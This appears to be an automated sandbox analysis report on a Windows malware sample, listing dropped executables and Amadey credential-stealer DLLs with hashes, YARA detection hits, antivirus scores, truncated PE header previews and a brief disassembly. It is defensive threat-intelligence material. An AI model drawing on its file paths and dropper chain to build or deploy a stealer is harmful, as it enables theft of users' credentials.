                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c..................;.........>.;.. ....;...@.. ........................<...........@..................................;.K.....;.......................;...................................................... ............... ..H............text...D.;.. ....;................. ..`.rsrc.........;.......;.............@..@.reloc........;.......;.............@..B................ .;.....H.........;.P............'...~;..........................................0.._.......~....,.(....,..(....~....,.(....,..(....~....,.(....,..(....~....,.(....,..(....~....,.~.... ....Z(....~....,.r...pr...p.(....&..8....~.....o.....~.....o.....~.....o.....~.....o.......(......~....,...(......~....r...p(....,.(....r...po......(......+)~....r1..p(....,...(....r...po....(..........(....(..........(.......(......X..~....o....?....~....&*..0../........s.....s.......s.......o.......,
                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\AAE1.exe
                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):250368
                                                                                                                                                                                    Entropy (8bit):6.368078764092466
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6144:l324aAQaiCam1I3zCtZf/NPPoNqgu1yGfIwHE:lDEmV7f/9ozu1yo
                                                                                                                                                                                    MD5:20F88F67297070067A7CF9A17BCD8904
                                                                                                                                                                                    SHA1:3BCF47DF92C2ACE9DDC71C25D520E323743467BF
                                                                                                                                                                                    SHA-256:7812B5F5FD710358255D8847F61729386CB982C55BEB12A77E240D3377AAEAFB
                                                                                                                                                                                    SHA-512:BA359E439795BD1D2BD8A1B33169920DA2A348E24E68785326F59F47C0B0821EAE7D0010297C9B387313794A280D1E823FD9915DC874CF2ADA60364C6E1871F6
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\Amadey.exe, Author: Joe Security
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 77%
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.M...#...#...#.J. ...#.J.&..#.J.'...#..'...#.. ...#..&.:.#.J."...#..."..#.*...#.....#.!...#.Rich..#.........PE..L......c............................%.............@..........................0............@.................................p....................................)..@`..p...................Ta.......`..@...............d............................text............................... ..`.rdata..Z...........................@..@.data....D..........................@....rsrc...............................@..@.reloc...).......*..................@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):3909632
                                                                                                                                                                                    Entropy (8bit):7.91078654189774
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:98304:x8b7QVhgZg8gPdHoV45xAyHw0hrz3UuIUD1MBPyMnA3QX:xcSgZgPRjrHbz39dAF8
                                                                                                                                                                                    MD5:A14001B42E3E4F1199A4DA5BECED8766
                                                                                                                                                                                    SHA1:676B4F6E7C23EB0A54DE8727D3E1F296CB9F2AD6
                                                                                                                                                                                    SHA-256:F30B70E5A6634D6CEBE64C9152B54E290E548106B674A3DA2AD2E9664684B788
                                                                                                                                                                                    SHA-512:64190938E8DE82E086D6BA91E6822ADBE2D199CAF6512B42EB392B0784D01BA5268F27A9462D23C2EC14E9EF86084840A74B0A70E31F93C125C15D4A3A77991C
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                    • Rule: MALWARE_Win_DLInjector04, Description: Detects downloader / injector, Source: C:\Users\user\AppData\Local\Temp\CEE7.exe, Author: ditekSHen
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c..................;.........>.;.. ....;...@.. ........................<...........@..................................;.K.....;.......................;...................................................... ............... ..H............text...D.;.. ....;................. ..`.rsrc.........;.......;.............@..@.reloc........;.......;.............@..B................ .;.....H.........;.P............'...~;..........................................0.._.......~....,.(....,..(....~....,.(....,..(....~....,.(....,..(....~....,.(....,..(....~....,.~.... ....Z(....~....,.r...pr...p.(....&..8....~.....o.....~.....o.....~.....o.....~.....o.......(......~....,...(......~....r...p(....,.(....r...po......(......+)~....r1..p(....,...(....r...po....(..........(....(..........(.......(......X..~....o....?....~....&*..0../........s.....s.......s.......o.......,
                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\6267.exe
                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):240640
                                                                                                                                                                                    Entropy (8bit):6.364434708313012
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6144:Yj52LUq3gX/Et6hXQ31UrhfSK6uVyuNg7tGgUO:YjqmXUghSuVyuNS7
                                                                                                                                                                                    MD5:868ACB586930934B250C949E4C3E180E
                                                                                                                                                                                    SHA1:D5C992C5F3C5F14205D5E6548979190DD039460A
                                                                                                                                                                                    SHA-256:4DD88158EABF16C0F154ABCB4513042D1AEB4714ECE7A3260F089DE288B21CD5
                                                                                                                                                                                    SHA-512:285570BD404EF80B442CF397CB64E896394B2DC125EB3C4517E21224D63F2CB10DF6748881A91C6EBB2027DB082697EA7230502CE8DF103E76D8256F70BBFCF1
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exe, Author: Joe Security
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.M...#...#...#.J. ...#.J.&..#.J.'...#..'...#.. ...#..&.:.#.J."...#..."..#.*...#.....#.!...#.Rich..#.........PE..L....7.c.............................u............@.......................................@.................................8m..d...............................p(...?..p....................@......0@..@............................................text............................... ..`.rdata..............................@..@.data....D...........h..............@....rsrc...............................@..@.reloc..p(.......*..................@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\AAE1.exe
                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):3648512
                                                                                                                                                                                    Entropy (8bit):7.8024370312464315
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:98304:5DjuZi14gKaZstNYLRo30EEJYfOISB4M2qpIudx:husHKaqUR+wJ14M9pzx
                                                                                                                                                                                    MD5:BA2D41CE64789F113BAA25AD6014D9EF
                                                                                                                                                                                    SHA1:2A613D52DE7BEDDCED943814A65F66D8E465FC58
                                                                                                                                                                                    SHA-256:FC78C2FC16065BC118F812C5B9DF3FA2D2194FEE2E684393D151270C7A89C646
                                                                                                                                                                                    SHA-512:1029C6936334BA5905DBE6CBD190E8C6F200A20545E6AD65AC35CCD7E10AED217648E74C103ACFCF5136D239EC7B241AB379E52C9F7502FD5D9DA793C4F78301
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...5I.c..........#...................E........@..............................a........... ..................................................sC.d.....a.......`............................................X.H.0...p.`.8.............F..............................text............................... ..`.rdata..P...........................@..@.data.......P......................@....pdata.............................@..@_RDATA..............................@..@.vmp0...IG..........................`..`.vmp1.....7...)...7.................`..h.rsrc.........a.......7.............@..@................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exe
                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):129024
                                                                                                                                                                                    Entropy (8bit):6.51230106176088
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:Yx7pOYzBekV3tiINwyP7XSSJds3zhrjPcnqULv4O9:Yx7ZNhV3vwyOztPc3L
                                                                                                                                                                                    MD5:A98318B262AEE202DF529FD4DFE4C4BA
                                                                                                                                                                                    SHA1:536831B3A0F902BA4D003871C47A967777DE0959
                                                                                                                                                                                    SHA-256:12FB1C2A561508D6CB02B9213DE78383D15D5A85FCD70FE5455C988DE4DB0DF2
                                                                                                                                                                                    SHA-512:555F347D098FFCEFA2DDABEBC5F3CBB7D0956B2CA02E43FBE4F629BEBF03328F6187A6B7E4E09BFC82E87053D1631AE7D469DD4D95E167FABADBFA7ADC4397DE
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, Author: Joe Security
                                                                                                                                                                                    • Rule: INDICATOR_TOOL_PWS_Amady, Description: Detects password stealer DLL. Dropped by Amadey, Source: C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, Author: ditekSHen
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................X......|.............@..........................@..........................................O.......&.... ..............................................................................................................CODE................................ ..`DATA................................@...BSS......................................idata..&...........................@....edata..O...........................@..P.reloc..............................@..P.rsrc........ ......................@..P.............@......................@..P................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exe
                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):129024
                                                                                                                                                                                    Entropy (8bit):6.512017496640721
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:Yx7pOYzBeka3tiINwyP7XSSJds3zhrjPcnqULv4C9:Yx7ZNha3vwyOztPc3L
                                                                                                                                                                                    MD5:83D6D2070C5800BBAF7E61604273FFE2
                                                                                                                                                                                    SHA1:601568D5A02B30A302F6E3C4F9CD5EA53D9576A0
                                                                                                                                                                                    SHA-256:E59B1A06E20FFFA3C526B89920CC92A5E186BCC2C46A04EC540357E3D1869233
                                                                                                                                                                                    SHA-512:30A46A13706BA627F5F05FAF71BED26D5A63473AA7766C2FCF72F4CB5B2147E4645C678E509E28CE1C1A238F1D4AA5F67B80AD2675CB3CA91B88AFAC3D7204B3
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Roaming\07c6bc37dc5087\cred64.dll, Author: Joe Security
                                                                                                                                                                                    • Rule: INDICATOR_TOOL_PWS_Amady, Description: Detects password stealer DLL. Dropped by Amadey, Source: C:\Users\user\AppData\Roaming\07c6bc37dc5087\cred64.dll, Author: ditekSHen
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................X......|.............@..........................@..........................................O.......&.... ..............................................................................................................CODE................................ ..`DATA................................@...BSS......................................idata..&...........................@....edata..O...........................@..P.reloc..............................@..P.rsrc........ ......................@..P.............@......................@..P................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\5ca56b659f\nbveek.exe
                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1074176
                                                                                                                                                                                    Entropy (8bit):6.479087791249224
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24576:9WaH8CpPWxgnZDrZ+7xr17ZfVfTxN43y19:YFxgnZDrZSxBZfVfka
                                                                                                                                                                                    MD5:0017009AA184EBBD2D53A323114B0A34
                                                                                                                                                                                    SHA1:2049B480D74B0A9FE5F813E4DDB13328F930878D
                                                                                                                                                                                    SHA-256:AAFC78DFAC130DED368B8A0EB3648D371C2F2332804732E43C8431DDF01033CE
                                                                                                                                                                                    SHA-512:90434D597FD6D0CC65840A2607D4586D1CD855B42041AC80727B819CB3ADA58EE29C2FC9E79CE2A566FD940D4B21ACC9DCDC8BDC8B1A86F9BD3EAEC80681E244
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Author: Joe Security
                                                                                                                                                                                    • Rule: OlympicDestroyer_1, Description: OlympicDestroyer Payload, Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Author: kevoreilly
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............sO..sO..sO..wN..sO..pN..sO..vNe.sO..vN..sO..wN..sO..pN..sO..rN..sO..rOi.sON.zN..sON.sN..sON..O..sON.qN..sORich..sO................PE..d...Q.c.........." ................H.....................................................`.........................................p{..X....{..................................h.......p............................................................................text............................... ..`.rdata..............................@..@.data....o.......6...|..............@....pdata..............................@..@_RDATA...............J..............@..@.rsrc................L..............@..@.reloc..h............N..............@..B................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):375296
                                                                                                                                                                                    Entropy (8bit):6.473305073049476
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6144:mzSLDKvDqXQFD+300sloGfRcGdoxupmLQbjT:mmwDsMykUI2GdoxupmLQ
                                                                                                                                                                                    MD5:0FC582C0C4D53B3C6E5B23D3CCA924A2
                                                                                                                                                                                    SHA1:CF6EAF786B7E85095382CA1442F8FE5F820B70A7
                                                                                                                                                                                    SHA-256:AD512590DA930D6B06DF411C5DD9B65EFFF702B5ABFB9F2E84F8EA043B753213
                                                                                                                                                                                    SHA-512:845141F9F27875F6AC38AFC8F27A1A6CEFB2F47E2427863A942ABF490D169EDA224703B1D3760F6EFBD0194823D0E93E019D3A0866C9554891E1DE4525FB9476
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 69%
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X?>..^P..^P..^P....:^P.....^P....e^P.;.+..^P..^Q.b^P.....^P.....^P......^P.Rich.^P.........................PE..L... ..b.................(...........c.......@....@..................................&......................................$-..<............................P......................................`I..@............................................text....&.......(.................. ..`.data....s...@...v...,..............@....rsrc...............................@..@.reloc.......P.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):26
                                                                                                                                                                                    Entropy (8bit):3.95006375643621
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):215040
                                                                                                                                                                                    Entropy (8bit):6.604646966060919
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:ZXZ6F/oLW4kxBLzya57xljonXo8tA4du6moc4pmcTdWT711l:9JLBQzyaxhl+XmoPI71
                                                                                                                                                                                    MD5:25B78BEA81EFF1119CDD474FED74E295
                                                                                                                                                                                    SHA1:71E1393379DB38B5AA38588C9BCCE49D39127314
                                                                                                                                                                                    SHA-256:452D14DD8C46AE01D5B2FC19F9B4861DF5B5BA4C32E676BDD22A9EE67D40A38C
                                                                                                                                                                                    SHA-512:D043725B0EC58F99390C20E112D044F203B2EB91F18A07095BF8B62CB7C7F995BEA996463A15209993A6C8E64909194E8D90AC4FFC13BA072C7668F7EFC3020D
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................;.Y.....Z.....L...................K.....[.....^....Rich............................PE..L......b.................j...........`............@.................................oe.......................................m..<....P.............................. ................................C..@............................................text...Ph.......j.................. ..`.data................n..............@....rsrc........P......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):15
                                                                                                                                                                                    Entropy (8bit):3.240223928941852
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:o3F:o1
                                                                                                                                                                                    MD5:509B054634B6DE74F111C3E646BC80FD
                                                                                                                                                                                    SHA1:99B4C0F39144A92FE42E22473A2A2552FB16BD13
                                                                                                                                                                                    SHA-256:07C7C151ADD6D955F3C876359C0E2A3A3FB0C519DD1E574413F0B68B345D8C36
                                                                                                                                                                                    SHA-512:A9C2D23947DBE09D5ECFBF6B3109F3CF8409E43176AE10C18083446EDE006E60E41C3EA2D2765036A967FC81B085D5F271686606AED4154AE45287D412CF6D40
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    Preview:processed dir:
                                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                    Entropy (8bit):6.473305073049476
                                                                                                                                                                                    TrID:
                                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                    File name:Ej3vSx3p8Y.exe
                                                                                                                                                                                    File size:375296
                                                                                                                                                                                    MD5:0fc582c0c4d53b3c6e5b23d3cca924a2
                                                                                                                                                                                    SHA1:cf6eaf786b7e85095382ca1442f8fe5f820b70a7
                                                                                                                                                                                    SHA256:ad512590da930d6b06df411c5dd9b65efff702b5abfb9f2e84f8ea043b753213
                                                                                                                                                                                    SHA512:845141f9f27875f6ac38afc8f27a1a6cefb2f47e2427863a942abf490d169eda224703b1d3760f6efbd0194823d0e93e019d3a0866c9554891e1de4525fb9476
                                                                                                                                                                                    SSDEEP:6144:mzSLDKvDqXQFD+300sloGfRcGdoxupmLQbjT:mmwDsMykUI2GdoxupmLQ
                                                                                                                                                                                    TLSH:EB84BF01F36ABBA2EC13C13DA915DAE537BDB8605A14D6DF2358165F3EF0BA0C172618
                                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X?>..^P..^P..^P.....:^P......^P.....e^P.;.+..^P..^Q.b^P......^P......^P......^P.Rich.^P.........................PE..L... ..b...
                                                                                                                                                                                    Icon Hash:9cbc96b6b69484e2
                                                                                                                                                                                    Entrypoint:0x4063be
                                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                                    Digitally signed:false
                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                    DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                    Time Stamp:0x62C8C420 [Fri Jul 8 23:56:16 2022 UTC]
                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                    OS Version Major:5
                                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                                    File Version Major:5
                                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                                    Subsystem Version Major:5
                                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                                    Import Hash:9ffb6435807c3d3dd01b0864e7947205
                                                                                                                                                                                    Instruction
                                                                                                                                                                                    call 00007FE9049B49E1h
                                                                                                                                                                                    jmp 00007FE9049B042Eh
                                                                                                                                                                                    int3
                                                                                                                                                                                    int3
                                                                                                                                                                                    int3
                                                                                                                                                                                    int3
                                                                                                                                                                                    int3
                                                                                                                                                                                    int3
                                                                                                                                                                                    int3
                                                                                                                                                                                    int3
                                                                                                                                                                                    call 00007FE9049B05ECh
                                                                                                                                                                                    xchg cl, ch
                                                                                                                                                                                    jmp 00007FE9049B05D4h
                                                                                                                                                                                    call 00007FE9049B05E3h
                                                                                                                                                                                    fxch st(0), st(1)
                                                                                                                                                                                    jmp 00007FE9049B05CBh
                                                                                                                                                                                    fabs
                                                                                                                                                                                    fld1
                                                                                                                                                                                    mov ch, cl
                                                                                                                                                                                    xor cl, cl
                                                                                                                                                                                    jmp 00007FE9049B05C1h
                                                                                                                                                                                    mov byte ptr [ebp-00000090h], FFFFFFFEh
                                                                                                                                                                                    fabs
                                                                                                                                                                                    fxch st(0), st(1)
                                                                                                                                                                                    fabs
                                                                                                                                                                                    fxch st(0), st(1)
                                                                                                                                                                                    fpatan
                                                                                                                                                                                    or cl, cl
                                                                                                                                                                                    je 00007FE9049B05B6h
                                                                                                                                                                                    fldpi
                                                                                                                                                                                    fsubrp st(1), st(0)
                                                                                                                                                                                    or ch, ch
                                                                                                                                                                                    je 00007FE9049B05B4h
                                                                                                                                                                                    fchs
                                                                                                                                                                                    ret
                                                                                                                                                                                    fabs
                                                                                                                                                                                    fld st(0), st(0)
                                                                                                                                                                                    fld st(0), st(0)
                                                                                                                                                                                    fld1
                                                                                                                                                                                    fsubrp st(1), st(0)
                                                                                                                                                                                    fxch st(0), st(1)
                                                                                                                                                                                    fld1
                                                                                                                                                                                    faddp st(1), st(0)
                                                                                                                                                                                    fmulp st(1), st(0)
                                                                                                                                                                                    ftst
                                                                                                                                                                                    wait
                                                                                                                                                                                    fstsw word ptr [ebp-000000A0h]
                                                                                                                                                                                    wait
                                                                                                                                                                                    test byte ptr [ebp-0000009Fh], 00000001h
                                                                                                                                                                                    jne 00007FE9049B05B7h
                                                                                                                                                                                    xor ch, ch
                                                                                                                                                                                    fsqrt
                                                                                                                                                                                    ret
                                                                                                                                                                                    pop eax
                                                                                                                                                                                    jmp 00007FE9049B207Fh
                                                                                                                                                                                    fstp st(0)
                                                                                                                                                                                    fld tbyte ptr [004148BAh]
                                                                                                                                                                                    ret
                                                                                                                                                                                    fstp st(0)
                                                                                                                                                                                    or cl, cl
                                                                                                                                                                                    je 00007FE9049B05BDh
                                                                                                                                                                                    fstp st(0)
                                                                                                                                                                                    fldpi
                                                                                                                                                                                    or ch, ch
                                                                                                                                                                                    je 00007FE9049B05B4h
                                                                                                                                                                                    fchs
                                                                                                                                                                                    ret
                                                                                                                                                                                    fstp st(0)
                                                                                                                                                                                    fldz
                                                                                                                                                                                    or ch, ch
                                                                                                                                                                                    je 00007FE9049B05A9h
                                                                                                                                                                                    fchs
                                                                                                                                                                                    ret
                                                                                                                                                                                    fstp st(0)
                                                                                                                                                                                    jmp 00007FE9049B2055h
                                                                                                                                                                                    fstp st(0)
                                                                                                                                                                                    mov cl, ch
                                                                                                                                                                                    jmp 00007FE9049B05B2h
                                                                                                                                                                                    call 00007FE9049B057Eh
                                                                                                                                                                                    jmp 00007FE9049B2060h
                                                                                                                                                                                    int3
                                                                                                                                                                                    int3
                                                                                                                                                                                    int3
                                                                                                                                                                                    int3
                                                                                                                                                                                    int3
                                                                                                                                                                                    int3
                                                                                                                                                                                    int3
                                                                                                                                                                                    int3
                                                                                                                                                                                    push ebp
                                                                                                                                                                                    mov ebp, esp
                                                                                                                                                                                    add esp, 00000030h
                                                                                                                                                                                    Programming Language:
                                                                                                                                                                                    • [C++] VS2008 build 21022
                                                                                                                                                                                    • [ASM] VS2008 build 21022
                                                                                                                                                                                    • [ C ] VS2008 build 21022
                                                                                                                                                                                    • [IMP] VS2005 build 50727
                                                                                                                                                                                    • [RES] VS2008 build 21022
                                                                                                                                                                                    • [LNK] VS2008 build 21022
                                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x12d240x3c.text
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x281c0000x289b8.rsrc
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x28450000xcac.reloc
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x11f00x1c.text
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x49600x40.text
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x10000x1a8.text
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                    .text0x10000x126f80x12800False0.5751425253378378data6.75475221716344IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                    .data0x140000x28073c40x17600unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                    .rsrc0x281c0000x289b80x28a00False0.5980408653846154data5.828631245568482IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                    .reloc0x28450000x8dc00x8e00False0.07972051056338028data0.9919150373317112IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                    NameRVASizeTypeLanguageCountry
                                                                                                                                                                                    RT_ICON0x281cb100xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0SlovakSlovakia
                                                                                                                                                                                    RT_ICON0x281d9b80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0SlovakSlovakia
